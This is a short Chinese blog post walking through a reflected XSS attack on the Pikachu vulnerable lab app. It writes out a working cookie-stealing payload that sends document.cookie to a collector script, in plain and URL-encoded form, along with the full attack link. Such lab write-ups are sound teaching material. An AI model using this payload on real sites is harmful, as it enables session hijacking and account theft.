用了那么多平台,今天想自己研究一下攻击过程
话不多说,先上受害者
显然这里可能存在XSS
用弹窗试了一下,果不其然
自己写了两行代码,实现获取URL里面的cookie参数,然后将cookie写入一个新的文件cookie.txt中
然后构造payload <script> document.location='http://192.168.2.91/XSSCOOKIE/getcookie.php?cookie='+document.cookie</script>
document.cookie负责获取当前同源的cookie
document.location负责读取(访问)写好的文件,并携带上cookie参数
这里message携带的参数需要进行一次URL编码:#%3Cscript%3E%20document.location%3D%27http%3A%2F%2F192.168.2.91%2FXSSCOOKIE%2Fgetcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E
所以最后的成品链接就是这样:
http://192.168.2.91/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E%20document.location%3D%27http%3A%2F%2F192.168.2.91%2FXSSCOOKIE%2Fgetcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E&submit=submit
最后访问了链接之后,活生生的cookie就已经写好在cookie.txt中了。
本文来自博客园,作者:domb,转载请注明原文链接:https://www.cnblogs.com/domb2235/p/16204789.html